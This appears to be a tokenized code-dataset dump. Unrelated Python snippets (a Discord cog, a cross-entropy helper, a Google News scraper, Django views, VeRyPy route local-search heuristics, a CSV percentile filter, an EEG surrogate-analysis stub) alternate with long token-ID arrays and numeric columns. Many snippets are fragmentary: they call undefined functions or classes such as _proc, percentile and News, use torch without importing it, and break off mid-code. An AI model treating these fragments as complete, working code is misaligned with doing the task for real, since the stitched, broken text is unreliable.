32233,
198,
6738,
3049,
15042,
13,
12961,
1330,
440,
30515,
17,
35215,
3856,
11258,
198,
198,
6738,
3049,
15042... | 2.805263 | 190 |
from scrapy import Selector
| [
6738,
15881,
88,
1330,
9683,
273,
628
] | 4.142857 | 7 |
import discord
from discord.ext import commands, tasks
class History(commands.Cog):
"""History commands.""" | [
11748,
36446,
198,
6738,
36446,
13,
2302,
1330,
9729,
11,
8861,
198,
198,
4871,
7443,
7,
9503,
1746,
13,
34,
519,
2599,
198,
220,
220,
220,
37227,
18122,
9729,
526,
15931
] | 3.612903 | 31 |
import numpy as np
import random
from torch.utils.data.dataset import Dataset
def cross_entropy(input, target, size_average=True):
""" Cross entropy that accepts soft targets
Args:
pred: predictions for neural network
targets: targets, can be soft
size_average: if false, sum is returned instead of mean
Examples::
input = torch.FloatTensor([[1.1, 2.8, 1.3], [1.1, 2.1, 4.8]])
input = torch.autograd.Variable(out, requires_grad=True)
target = torch.FloatTensor([[0.05, 0.9, 0.05], [0.05, 0.05, 0.9]])
target = torch.autograd.Variable(y1)
loss = cross_entropy(input, target)
loss.backward()
"""
logsoftmax = torch.nn.LogSoftmax(dim=1)
if size_average:
return torch.mean(torch.sum(-target * logsoftmax(input), dim=1))
else:
return torch.sum(torch.sum(-target * logsoftmax(input), dim=1))
| [
11748,
299,
32152,
355,
45941,
198,
11748,
4738,
198,
6738,
28034,
13,
26791,
13,
7890,
13,
19608,
292,
316,
1330,
16092,
292,
316,
628,
198,
4299,
3272,
62,
298,
28338,
7,
15414,
11,
2496,
11,
2546,
62,
23913,
28,
17821,
2599,
198,
... | 2.371429 | 385 |
#Author: Zifan Wang | frank@zifan.wang
import re
import urllib.request
import collections
import time
from textblob import TextBlob
if __name__ == '__main__':
print("Please input key words: ", end='')
key_words = input().strip().replace(" ", "+")
print("Please input result number limit: ", end='')
limit = int(input().strip())
if limit % 100 != 0:
limit = limit // 100 + 1
else:
limit = limit // 100
print("Alright, let's go")
url = f"https://www.google.com/search?safe=strict&tbs=sbd%3A1&qdr:m&tbm=nws&q={key_words}&hl=en&lr=lang_en&num=100&strip=1"
# url = 'https://www.google.com/search?safe=strict&tbs=sbd%3A1&qdr:m&tbm=nws&q=Coronavirus+China&hl=en&lr=lang_en&num=100&strip=1'
headers = {
'Host': 'www.google.com',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
}
news_list = []
i = 0
print("Wait", end="")
while i < limit:
request = urllib.request.Request(url=url, headers=headers)
response = urllib.request.urlopen(request)
raw = response.read().decode('utf-8')
raw_list = raw.split('<div class="bkWMgd">')[1:]
for r in raw_list:
link = re.search('href="([^"]+?)"', r).group(1)
s = re.search('</g-img>([^<]+?)</div><div class="phYMDf nDgy9d" style="-webkit-line-clamp:2">([^<]+?)</div>', r)
try:
source = s.group(1)
except AttributeError as e:
source = ""
try:
title = s.group(2)
except AttributeError as e:
title = ""
news_list.append(News(link, source, title, "", None))
url = f"https://www.google.com/search?safe=strict&tbs=sbd%3A1&qdr:m&tbm=nws&q=Coronavirus+China&oq=Coronavirus+China&hl=en&lr=lang_en&num=100&strip=1&start={i*100}"
i += 1
print("..", end="")
print(f"\nObtained {len(news_list)} records on Google News.")
print("Now start further processing...")
man_links_title = []
man_links_time = []
man_links_both = []
headers = {
'Connection': 'keep-alive',
'User-Agent': "Mozilla/5.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
}
for n in news_list:
if n.source == "South China Morning Post":
n.time = "Null1"
continue
request = urllib.request.Request(url=n.link, headers = headers)
reopen = False
try:
response = urllib.request.urlopen(request)
except Exception as e:
reopen = True
if reopen:
time.sleep(5)
try:
response = urllib.request.urlopen(request, timeout=10)
except Exception as e:
man_links_both.append(n.link)
n.time = "Null1"
n.sentiment = TextBlob(n.title).sentiment
# print(f"Cannot open {n.link} Because {e}")
continue
try:
raw = response.read().decode('utf-8')
except Exception as e:
n.time = "Null1"
n.sentiment = TextBlob(n.title).sentiment
continue
try:
if n.source == 'South China Morning Post' or n.source == 'The New York Times' or n.source == 'CNBC'\
or n.source == 'Washington Post' or n.source == 'Wall Street Journal' or n.source == 'BBC News'\
or n.source == 'Daily Mail' or n.source == 'USA TODAY' or "abcnews.go.com" in n.link \
or n.source == 'CNA' or n.source == 'Globalnews.ca' or n.source == '7NEWS.com.au' or n.source == 'Seeking Alpha' \
or n.source == 'Eater NY' or n.source == 'New York Post' :
n.time = re.search('"datePublished":"([^"]+?)"', raw).group(1)
elif n.source == 'CNN International' or n.source == 'MarketWatch' or n.source == 'Newshub' or n.source == 'CTV News' \
or n.source == 'Richmond News' or n.source == 'The Star Online' :
n.time = re.search('"datePublished" content="([^"]+?)"', raw).group(1)
elif n.source == 'Reuters' or n.source == 'Aljazeera.com' or n.source == 'Livemint' or n.source == 'Khaleej Times' \
or n.source == '9News' or n.source == 'Sky News' or n.source == 'Fox News' or n.source == 'Economic Times' \
or n.source == 'Gulf News' or n.source == 'The Independent' or n.source == 'NEWS.com.au' \
or n.source == 'The Standard' or n.source == 'Reuters.com':
n.time = re.search('"datePublished": "([^"]+?)",', raw).group(1)
elif n.source == 'The Guardian' or n.source == 'Politico':
n.time = re.search("datetime='([^']+?)'", raw).group(1)
elif n.source == 'NPR' or n.source == 'straits times (press release)' or n.source == 'The Straits Times'\
or n.source == 'msnNOW' or n.source == 'KRQE News 13' or n.source == 'Bloomberg' or n.source == 'Al Jazeera America':
n.time = re.search('datetime="([^"]+?)"', raw).group(1)
elif n.source == 'Anadolu Agency':
n.time = re.search('<span style="padding-left:0px;" class="tarih">([^<]+?)</span>', raw).group(1)
elif n.source == 'Business Insider Nordic':
n.time = re.search('"datePublished":"([^"]+?)","dateModified"', raw).group(1)
elif n.source == 'Stuff.co.nz':
n.time = re.search('<span class="sics-component__byline__date">([^<]+?)</span>', raw).group(1)
elif n.source == 'Stuff.co.nz' or n.source == 'Stuff.co.nz' or "www.abc.net.au" in n.link or n.source == 'EcoWatch'\
or n.source == 'Financial Express' or n.source == 'WJTV' or n.source == 'The National Interest Online (blog)' \
or n.source == 'EcoWatch' or n.source == 'The Straits Times' or n.source == 'CNN International' or n.source == 'National Geographic':
n.time = re.search('"article:published_time" content="([^"]+?)"', raw).group(1)
elif n.source == 'CNN':
n.time = re.search('content="([^"]+?)" name="pubdate"', raw).group(1)
elif n.source == 'Forbes':
n.time = re.search('property="article:published"\s+?content="([^"]+?)"', raw).group(1)
elif n.source == 'MarketWatch (blog)':
n.time = re.search('name="parsely-pub-date" content="([^"]+?)"', raw).group(1)
elif n.source == 'KSL.com':
n.time = re.search('"pubDate":"([^"]+?)"', raw).group(1)
elif n.source == 'Nature.com':
n.time = re.search('name="prism.publicationDate" content="([^"]+?)"', raw).group(1)
elif n.source == 'ScienceAlert':
n.time = re.search('class="published_date" type="hidden" value="([^"]+?)"', raw).group(1)
else:
n.time = re.search('"datePublished":\s?"([^"]+?)"', raw).group(1)
except:
n.time = "Null2"
# print(f"Cannot find time in {n.link} - {n.source}")
man_links_time.append(n.link)
if n.title.endswith(" ..."):
in_title = n.title[:-4].replace("?", "\?").replace("$", "\$").replace(".", "\.")
try:
n_title = re.search(f'({in_title}[^<"\'\[\]/]+?)[<"\'\[\]/]', raw).group(1)
except Exception as e:
man_links_title.append(n.link)
# print(f"Cannot find title in {n.link}")
# with open(f"{n.title}.txt", mode="w") as f:
# f.write(raw)
n.sentiment = TextBlob(n.title).sentiment
continue
end = min(n_title.find(" - "), n_title.find(" | "))
if end != -1:
n_title = n_title[:end]
n_title.replace("'", "'").replace("'", "'").replace("[\t\n]", " ")
n.title = n_title
n.sentiment = TextBlob(n.title).sentiment
print("\r%-70s" % n.title, end="")
source_counter = collections.Counter()
title_counter = collections.Counter()
for n in news_list:
source_counter[n.source] += 1
title_token = n.title.lower().split(" ")
for token in title_token:
title_counter[token] += 1
# f.write("\n==========\nlinks need manual operation:\n")
# f.write(f'a. {len(man_links_title)} links \n')
# for link in man_links:
# f.write(f'{link}\n')
print("\n\nDone! Good Result:")
print(f"Obtained {len(news_list)} records.")
print("\nBad Result:")
print(f'{len(man_links_title)} links cannot get title')
print(f'{len(man_links_time)} links cannot get time')
print(f'{len(man_links_both)} links cannot get both title and time')
with open("news.txt", mode="w") as f:
for n in news_list:
f.write(str(n))
f.write("\n==========\nSource Counter:\n")
f.write(str(source_counter))
f.write("\n==========\nTitle Key Word counter:\n")
f.write(str(title_counter))
| [
2,
13838,
25,
1168,
361,
272,
15233,
930,
14346,
31,
89,
361,
272,
13,
47562,
198,
198,
11748,
302,
198,
11748,
2956,
297,
571,
13,
25927,
198,
11748,
17268,
198,
11748,
640,
198,
6738,
2420,
2436,
672,
1330,
8255,
3629,
672,
198,
1... | 2.040895 | 4,695 |
import numpy as np
import net.utilities
| [
11748,
299,
32152,
355,
45941,
198,
11748,
2010,
13,
315,
2410,
628
] | 3.416667 | 12 |
from insta.forms import CommentForm, ImageForm, ProfileForm, SignupForm
from django.shortcuts import render,redirect
# Create your views here.
from django.http import HttpResponse
from django.contrib.auth import login, authenticate
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from .emails import send_activation_email
from .tokens import account_activation_token
from .models import Image, Profile, Comment
# def activate(request, uidb64, token):
# try:
# uid = force_text(urlsafe_base64_decode(uidb64))
# user = User.objects.get(pk=uid)
# except (TypeError, ValueError, OverflowError, User.DoesNotExist):
# user = None
# if user is not None and account_activation_token.check_token(user, token):
# user.is_active = True
# user.save()
# login(request, user)
# # form = LoginForm()
# # return redirect('home')
# return HttpResponse('registration/login.html')
# else:
# return HttpResponse('Activation link is invalid')
@login_required(login_url='/accounts/login')
@login_required(login_url='/accounts/login')
| [
6738,
916,
64,
13,
23914,
1330,
18957,
8479,
11,
7412,
8479,
11,
13118,
8479,
11,
5865,
929,
8479,
198,
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
11,
445,
1060,
198,
198,
2,
13610,
534,
5009,
994,
13,
198,
6738,
42625,
14208,
... | 2.778431 | 510 |
# -*- coding: utf-8 -*-
###############################################################################
""" This file is a part of the VeRyPy classical vehicle routing problem
heuristic library and implements intra route (i.e. within one route) local
search improvement heuristics such as 2-opt, one-point-move etc. All operators
assume we start from a feasible solution. Also, all functions implementing the
operations have the following signature:
do_X_move(route, D, strategy, best_delta), where
* route is a list of nodes forming a route.The route must start and end to the
depot (index 0), e.g. [0,1,2,3,0].
* D is the symmetric full distance matrix, given as numpy-like 2darray.
Thus, D[i,j] gives the distance between nodes i and j.
* strategy is either FIRST_ACCEPT (default) or BEST_ACCEPT.
First accept returns a modified route as soon as the first improvement is
    encountered. Best accept tries all possible combinations and returns the
best one.
* best_delta is the required level of change in the in route cost. It can be
used to set the upper bound (requirement) for the improvement. Usually it
is None, which sets the level to 0.0. In that case only improving deltas are
accepted. If set to (large) positive value, best worsening move can also be
returned.
All intra route improvement operators return the new improved route and the
improvement (delta) as 2-tuple or (None,None) if no improvement was found."""
###############################################################################
#TODO:
# - support for asymmetric distances, the loops in 2-opt and 3-opt could keep
#    track of the mid segments cost in reverse order with negligible performance
# impact (no added loops, just update the reverse segment cost on each iter).
# - improve performance
# - use doubly linked list (dllist) as the data structure for the routes
#  - calculate nearest neighbour list of the route nodes and iterate through it
# instead of iterating over entire route when finding potential moves
# (this is probably the single greatest pefrormance improvement that can
# be made but requires some brain time to do right)
# - do not copy routes, make changes in place
# - use numba or even cython (and numba compatible dllist)
# Written in Python 2.7, but try to maintain Python 3+ compatibility
from __future__ import print_function
from __future__ import division
from builtins import range
from local_search import LSOPT
from config import COST_EPSILON as S_EPS
__author__ = "Jussi Rasku"
__copyright__ = "Copyright 2018, Jussi Rasku"
__credits__ = ["Jussi Rasku"]
__license__ = "MIT"
__maintainer__ = "Jussi Rasku"
__email__ = "jussi.rasku@jyu.fi"
__status__ = "Development"
def do_2opt_move(route, D, strategy=LSOPT.FIRST_ACCEPT, best_delta=None):
    """2-opt local search operation for the symmetric distances D.

    Removes two edges from the route and checks whether reconnecting the
    four endpoints the other way (which reverses the segment in between)
    shortens the route.

    Returns (improved_route, delta) or (None, None) if no accepted move
    was found.
    """
    n = len(route)
    if not best_delta:
        best_delta = 0
    chosen = None
    stop_search = False

    for left in range(0, n - 1):
        for right in range(left + 1, n - 1):
            a, b = route[left], route[left + 1]
            c, d = route[right], route[right + 1]
            # Replacing edges a-b and c-d with a-c and b-d reverses the
            # chain from b to c. Any savings show up as a negative delta.
            delta = (D[a, c] + D[b, d]) - (D[a, b] + D[c, d])
            if delta + S_EPS < best_delta:
                chosen = (left, right)
                best_delta = delta
                if strategy == LSOPT.FIRST_ACCEPT:
                    stop_search = True
                    break  # right loop
        if stop_search:
            break  # left loop

    if chosen is None:
        return None, None
    i, j = chosen
    # Keep the head, splice in the reversed middle segment, keep the tail.
    return route[:i + 1] + route[j:i:-1] + route[j + 1:], best_delta
def do_3opt_move(route, D, strategy=LSOPT.FIRST_ACCEPT, best_delta=None):
    """ 3-opt local search operation for the symmetric distances D.

    Removes three edges (a-b, c-d, e-f) from the route and tries all 7
    distinct reconnections (the first three of which are 2-opt moves).

    Parameters
    ----------
    route : list
        Nodes forming the route, starting and ending at the depot (0).
    D : numpy-like 2D array
        Symmetric full distance matrix.
    strategy : LSOPT.FIRST_ACCEPT or LSOPT.BEST_ACCEPT
    best_delta : float, optional
        Required level of change in route cost (defaults to 0.0).

    Returns
    -------
    (new_route, delta) 2-tuple, or (None, None) if no move was accepted.
    """
    rN = len(route)
    best_move = None
    if not best_delta:
        best_delta = 0
    accept_move = False

    for i in range(0, rN - 1):
        for j in range(i + 1, rN - 1):
            for k in range(j + 1, rN - 1):
                # the endpoints of the three removed edges
                a = route[i]
                b = route[i + 1]
                c = route[j]
                d = route[j + 1]
                e = route[k]
                f = route[k + 1]

                removed_weights = D[a, b] + D[c, d] + D[e, f]

                # For simplicity (and speed) the 7 reconnections are
                # written out explicitly instead of being iterated.

                ## 2-opt moves

                # keep a-b, reconnect c-e and d-f (reverses segment d..e)
                delta = (D[a, b] + D[c, e] + D[d, f]) - removed_weights
                if delta + S_EPS < best_delta:
                    best_move = ((None, i + 1, 1), (i + 1, j + 1, 1),
                                 (k, j, -1), (k + 1, None, 1))
                    best_delta = delta
                    if strategy == LSOPT.FIRST_ACCEPT:
                        accept_move = True
                        break  # k loop

                # reconnect a-c and b-d, keep e-f (reverses segment b..c)
                # BUG FIX: this previously read `delta==(...)`, a no-op
                # comparison instead of an assignment, so this move was
                # never actually evaluated.
                delta = (D[a, c] + D[b, d] + D[e, f]) - removed_weights
                if delta + S_EPS < best_delta:
                    best_move = ((None, i + 1, 1), (j, i, -1),
                                 (j + 1, k + 1, 1), (k + 1, None, 1))
                    best_delta = delta
                    if strategy == LSOPT.FIRST_ACCEPT:
                        accept_move = True
                        break  # k loop

                # reconnect a-e and b-f (reverses the whole segment b..e)
                delta = (D[a, e] + D[d, c] + D[b, f]) - removed_weights
                if delta + S_EPS < best_delta:
                    best_move = ((None, i + 1, 1), (k, j, -1),
                                 (j, i, -1), (k + 1, None, 1))
                    best_delta = delta
                    if strategy == LSOPT.FIRST_ACCEPT:
                        accept_move = True
                        break  # k loop

                ## true 3-opt moves

                # a-c, b-e, d-f (both middle segments reversed)
                delta = (D[a, c] + D[b, e] + D[d, f]) - removed_weights
                if delta + S_EPS < best_delta:
                    best_move = ((None, i + 1, 1), (j, i, -1),
                                 (k, j, -1), (k + 1, None, 1))
                    best_delta = delta
                    if strategy == LSOPT.FIRST_ACCEPT:
                        accept_move = True
                        break  # k loop

                # a-d, e-b, c-f (segments swapped, orientation kept)
                delta = (D[a, d] + D[e, b] + D[c, f]) - removed_weights
                if delta + S_EPS < best_delta:
                    best_move = ((None, i + 1, 1), (j + 1, k + 1, 1),
                                 (i + 1, j + 1, 1), (k + 1, None, 1))
                    best_delta = delta
                    if strategy == LSOPT.FIRST_ACCEPT:
                        accept_move = True
                        break  # k loop

                # a-d, e-c, b-f (segments swapped, first one reversed)
                delta = (D[a, d] + D[e, c] + D[b, f]) - removed_weights
                if delta + S_EPS < best_delta:
                    best_move = ((None, i + 1, 1), (j + 1, k + 1, 1),
                                 (j, i, -1), (k + 1, None, 1))
                    best_delta = delta
                    if strategy == LSOPT.FIRST_ACCEPT:
                        accept_move = True
                        break  # k loop

                # a-e, d-b, c-f (segments swapped, second one reversed)
                delta = (D[a, e] + D[d, b] + D[c, f]) - removed_weights
                if delta + S_EPS < best_delta:
                    best_move = ((None, i + 1, 1), (k, j, -1),
                                 (i + 1, j + 1, 1), (k + 1, None, 1))
                    best_delta = delta
                    # (normalized: the redundant `best_move and` guard was
                    # dropped — best_move was just assigned above)
                    if strategy == LSOPT.FIRST_ACCEPT:
                        accept_move = True
                        break  # k loop

            if accept_move:
                break  # j loop
        if accept_move:
            break  # i loop

    if best_move:
        sgmt1, sgmt2, sgmt3, sgmt4 = best_move
        # the head containing leaving the depot +
        # the first segment, reversed or not +
        # the second segment, reversed or not +
        # the tail containing return to the depot
        return route[sgmt1[0]:sgmt1[1]:sgmt1[2]] +\
               route[sgmt2[0]:sgmt2[1]:sgmt2[2]] +\
               route[sgmt3[0]:sgmt3[1]:sgmt3[2]] +\
               route[sgmt4[0]:sgmt4[1]:sgmt4[2]], best_delta
    return None, None
def do_relocate_move(route, D, strategy=LSOPT.FIRST_ACCEPT, best_delta=None):
    """Relocate local search operation for the symmetric distances D.

    Checks whether any single node of the route can be moved to another
    position on the same route at a lower total cost.

    Note that the relocate search space is a subset of 3-opt, but 3-opt's
    search space is larger.
    """
    n = len(route)
    if not best_delta:
        best_delta = 0
    chosen = None
    stop_search = False

    for src in range(1, n - 1):
        prv, node, nxt = route[src - 1], route[src], route[src + 1]
        for dst in range(1, n):
            # skip the positions that would leave the node where it is
            if dst == src or dst == src - 1:
                continue
            before, after = route[dst - 1], route[dst]
            # skip the degenerate no-op positions next to the node itself
            if before == node or after == node:
                continue
            # cost of removing node from between prv and nxt, plus the
            # cost of inserting it between before and after
            delta = (-D[prv, node] - D[node, nxt] + D[prv, nxt]
                     - D[before, after] + D[before, node] + D[node, after])
            if delta + S_EPS < best_delta:
                chosen = (src, dst)
                best_delta = delta
                if strategy == LSOPT.FIRST_ACCEPT:
                    stop_search = True
                    break  # dst loop
        if stop_search:
            break  # src loop

    if chosen is None:
        return None, None
    i, j = chosen
    if i < j:
        return route[:i] + route[i + 1:j] + [route[i]] + route[j:], best_delta
    return route[:j] + [route[i]] + route[j:i] + route[i + 1:], best_delta
def do_exchange_move(route, D, strategy=LSOPT.FIRST_ACCEPT, best_delta=None):
    """(Node) exchange local search operation for the symmetric distances D.

    Checks whether swapping the positions of two route nodes shortens the
    route.

    Note that the exchange search space is a subset of 4-opt, but 4-opt's
    search space is significantly larger.
    """
    n = len(route)
    if not best_delta:
        best_delta = 0
    chosen = None
    stop_search = False

    for p1 in range(1, n - 1):
        for p2 in range(p1 + 1, n - 1):
            a, b, c = route[p1 - 1], route[p1], route[p1 + 1]
            d, e, f = route[p2 - 1], route[p2], route[p2 + 1]
            if c == e:
                # b and e are adjacent: the shared edge b-e flips direction
                delta = (D[a, e] + D[e, b] + D[b, f]
                         - D[a, b] - D[b, e] - D[e, f])
            else:
                # swap b (between a and c) and e (between d and f)
                delta = (D[a, e] + D[e, c] + D[d, b] + D[b, f]
                         - D[a, b] - D[b, c] - D[d, e] - D[e, f])
            if delta + S_EPS < best_delta:
                chosen = (p1, p2)
                best_delta = delta
                if strategy == LSOPT.FIRST_ACCEPT:
                    stop_search = True
                    break  # p2 loop
        if stop_search:
            break  # p1 loop

    if chosen is None:
        return None, None
    i, j = chosen
    return (route[:i] + [route[j]] + route[i + 1:j] + [route[i]]
            + route[j + 1:]), best_delta
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
29113,
29113,
7804,
4242,
21017,
198,
37811,
770,
2393,
318,
257,
636,
286,
262,
8016,
46987,
20519,
15993,
4038,
28166,
1917,
198,
258,
27915,
5888,
290,
23986,
23422,
63... | 1.727668 | 8,049 |
import logging
from pbase.papp import TRAIN_TAG, VALID_TAG, TEST_TAG
from pbase.papp.logger import Logger
| [
11748,
18931,
198,
198,
6738,
279,
8692,
13,
79,
1324,
1330,
29125,
1268,
62,
42197,
11,
26173,
2389,
62,
42197,
11,
43001,
62,
42197,
198,
6738,
279,
8692,
13,
79,
1324,
13,
6404,
1362,
1330,
5972,
1362,
198
] | 2.815789 | 38 |
#!/usr/bin/env python3.8
# -*- coding: utf-8 -*-
"""
**Created:** ??.??.2022
**Modified:** ??.??.2022
**Authors:** [Tobias Rosskopf](mailto:tobirosskopf@gmail.com)
<module_name>'s docstring
"""
class ClassName:
    """
    Class for <ClassName>
    """

    def __init__(self, name: str = "") -> None:
        """
        <ClassName> constructor

        Args:
            name (str): Name of instance
        """
        self.name: str = name

    def __repr__(self) -> str:
        """
        Generates REPL representation for <ClassName>

        Returns:
            str: REPL representation
        """
        return f"{self.__class__.__name__}({self.name})"

    def __str__(self) -> str:
        """
        Generates string representation for <ClassName>

        Returns:
            str: String representation
        """
        return f"{self.name}"

    def __eq__(self, other: object) -> bool:
        """
        Checks if <ClassName> instance is equal to other

        Args:
            other (object): Other object

        Returns:
            bool: True if equal, False otherwise
        """
        if isinstance(other, ClassName):
            return self.name == other.name
        # Returning NotImplemented (rather than False) lets Python try the
        # reflected comparison on `other` before falling back to identity.
        return NotImplemented

    def __hash__(self) -> int:
        """
        Hash consistent with __eq__ (equal instances hash equally).

        BUG FIX: defining __eq__ alone sets __hash__ to None, silently
        making instances unhashable (unusable in sets or as dict keys).

        Returns:
            int: Hash of the instance name
        """
        return hash(self.name)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
13,
23,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
198,
1174,
41972,
25,
1174,
220,
220,
220,
19153,
13,
3548,
13,
1238,
1828,
198,
1174,
5841,
... | 2.120482 | 581 |
import numpy as np
from shfl.federated_aggregator.fedavg_aggregator import FedAvgAggregator
| [
11748,
299,
32152,
355,
45941,
198,
198,
6738,
427,
2704,
13,
69,
5702,
515,
62,
9460,
2301,
1352,
13,
19082,
615,
70,
62,
9460,
2301,
1352,
1330,
10169,
48997,
46384,
2301,
1352,
628
] | 2.848485 | 33 |
from scipy.sparse import load_npz
from scipy.spatial import distance
from joblib import Parallel
from joblib import delayed
def chunks(lst, n):
    """Yield successive n-sized chunks from lst.

    The final chunk is shorter when len(lst) is not a multiple of n.

    from:
    https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks
    """
    for offset in range(0, len(lst), n):
        yield lst[offset:offset + n]
# Import one-hot encoded architectures
macro_one_hot_archs = load_npz('one_hot_encoded_unique_macro_archs.npz')
# todense() converts the sparse matrix to a dense numpy matrix
macro_one_hot_archs = macro_one_hot_archs.todense()
print('Read archs')
# Create neighborhood graph
n_nodes = macro_one_hot_archs.shape[0]
print('nodes: ', n_nodes)
# NOTE(review): this file handle is opened but never written to or
# closed anywhere in this script — confirm it is still needed.
f = open('distances2.txt', 'w')
# Compute pairwise distances for every unordered pair (x, y), x < y,
# restricted to x in the first half of the nodes.
# NOTE(review): `_proc` is not defined or imported in this file — verify
# where it comes from before running.
dists = \
    Parallel(n_jobs=-1,
             verbose=10,
             batch_size=32768,
             backend='multiprocessing')(delayed(_proc)(x, y)
                                        for x in range(int(n_nodes // 2))
                                        for y in range(n_nodes)
                                        if x < y)
print('calculated dists')
print("END!")
| [
198,
6738,
629,
541,
88,
13,
82,
29572,
1330,
3440,
62,
37659,
89,
198,
6738,
629,
541,
88,
13,
2777,
34961,
1330,
5253,
198,
6738,
1693,
8019,
1330,
42945,
198,
6738,
1693,
8019,
1330,
11038,
628,
198,
4299,
22716,
7,
75,
301,
11,
... | 2.049713 | 523 |
import csv
import numpy as np
import os
import re
import scipy.stats
import sys
import time
# Given a regular expression, list the files that match it, and ask for user input
# Given a regular expression, list the directories that match it, and ask for user input
# List the files with a regular expression
# Change the color of text in the terminal
# Leaving the foreground or background blank will reset the color to its default
# Providing a message will return the colored message (reset to default afterwards)
# If it's not working for you, be sure to call os.system('cls') before modifying colors
# Usage:
# - print(color('black', 'white', 'Inverted') + ' Regular')
# - print(color('black', 'white') + 'Inverted' + color() + ' Regular')
# Return the +- value after a set of data
# Ask the user for the logs directory, then collect the parsed handshake
# CSV files in it (selectDir/listFiles are helpers described in the
# comments above — presumably defined earlier in this file; verify).
directory = selectDir('.*Logs.*', True)
csvFiles = listFiles(r'.*\_parsed_handshake.csv', directory)
for inputFileName in csvFiles:
    print(f'Processing "{inputFileName}"...')
    # First pass: read every handshake duration (column 3) to find the
    # 95th percentile. NUL bytes are stripped so csv.reader does not choke.
    readerFile = open(inputFileName, 'r')
    reader = csv.reader(x.replace('\0', '') for x in readerFile)
    temp_header = next(reader)
    handshake_durations = []
    for row in reader:
        handshake_duration = float(row[3])
        handshake_durations.append(handshake_duration)
    top_95_quantile = percentile(handshake_durations, 95)
    print(f' Top 95% percentile: {top_95_quantile}')
    readerFile.close()
    # 95 quantile has now been computed
    # Second pass: copy the file, dropping rows at or above the cutoff.
    outputFilePath = os.path.join(directory, os.path.basename(inputFileName[:-4] + '_remove95percentile.csv'))
    outputFile = open(outputFilePath, 'w', newline='')
    outputWriter = csv.writer(outputFile)
    readerFile = open(inputFileName, 'r')
    reader = csv.reader(x.replace('\0', '') for x in readerFile)
    temp_header = next(reader)
    outputWriter.writerow(temp_header)
    removedRows = 0
    totalRows = 0
    for row in reader:
        totalRows += 1
        handshake_duration = float(row[3])
        # Skip (do not copy) any row in the top 5% of durations.
        if handshake_duration >= top_95_quantile:
            removedRows += 1
            continue
        outputWriter.writerow(row)
    readerFile.close()
    outputFile.close()
    print(f' {removedRows} / {totalRows} rows were removed.')
    print(f' Saved to {outputFilePath}')
print('Goodbye.')
sys.exit()
| [
11748,
269,
21370,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28686,
198,
11748,
302,
198,
11748,
629,
541,
88,
13,
34242,
198,
11748,
25064,
198,
11748,
640,
198,
198,
2,
11259,
257,
3218,
5408,
11,
1351,
262,
3696,
326,
2872,
3... | 3.009763 | 717 |
import threading
import time
from datetime import datetime
class StartOverException(Exception):
    """Signals that the reminder thread loop should be restarted."""
# TODO set a limit on reminders per user? also same for offlinemessages
| [
11748,
4704,
278,
198,
11748,
640,
198,
6738,
4818,
8079,
1330,
4818,
8079,
628,
198,
4871,
7253,
5886,
16922,
7,
16922,
2599,
198,
220,
220,
220,
37227,
21762,
786,
284,
15765,
262,
15438,
4704,
9052,
37811,
198,
220,
220,
220,
1208,
... | 3.698413 | 63 |
from flask.views import MethodView
from flask import jsonify, request, abort, redirect, url_for
from impi.get_impi import *
import logging
import json
| [
6738,
42903,
13,
33571,
1330,
11789,
7680,
198,
6738,
42903,
1330,
33918,
1958,
11,
2581,
11,
15614,
11,
18941,
11,
19016,
62,
1640,
198,
6738,
848,
72,
13,
1136,
62,
11011,
72,
1330,
1635,
198,
11748,
18931,
198,
11748,
33918,
198
] | 3.682927 | 41 |
import os
from threading import Condition
from typing import Any, List, Optional, Tuple
from socketio import Client, ClientNamespace
from .common.configuration import configure
from .comparator import JsonDataComparator
from .interaction import Interaction, InteractionLoader
from .runner import FailedInteraction, ScenarioRunner
from .scenario import Scenario, ScenarioFragmentLoader
# Key used to carry the session identifier in message payloads.
SESSION_ID_KEY = "session_id"
# Socket.IO event names emitted by the bot and by the user respectively.
EVENT_BOT_UTTERED = "bot_uttered"
EVENT_USER_UTTERED = "user_uttered"
# Environment variable that overrides the bot-response wait time.
ENV_BOT_RESPONSE_TIMEOUT = "BOT_RESPONSE_TIMEOUT"
# Seconds to wait for a bot response (default 6.0 when the env var is unset).
BOT_RESPONSE_TIMEOUT = float(os.environ.get(ENV_BOT_RESPONSE_TIMEOUT, 6.0))
# Flags used to tag message direction when recording interactions.
IS_USER_MESSAGE = True
IS_BOT_MESSAGE = False
@configure(
"protocol.url", InteractionLoader, ScenarioFragmentLoader, JsonDataComparator
)
| [
11748,
28686,
198,
6738,
4704,
278,
1330,
24295,
198,
6738,
19720,
1330,
4377,
11,
7343,
11,
32233,
11,
309,
29291,
198,
198,
6738,
17802,
952,
1330,
20985,
11,
20985,
36690,
10223,
198,
198,
6738,
764,
11321,
13,
11250,
3924,
1330,
174... | 2.91954 | 261 |
# -*- coding: utf-8 -*-
import numpy as np
np.set_printoptions(precision=3, linewidth=256)
from dyconnmap.ts import fdr, surrogate_analysis
if __name__ == "__main__":
    # Fixed seed so the surrogate analysis is reproducible.
    rng = np.random.RandomState(0)

    # Load two EEG channels from the example recording.
    data = np.load(
        "/home/makism/Github/dyconnmap/examples/data/eeg_32chans_10secs.npy")
    ts1 = data[0, :].ravel()
    ts2 = data[1, :].ravel()

    # Estimate the significance of the ts1/ts2 correlation against 1000
    # surrogates (ts1 kept fixed).
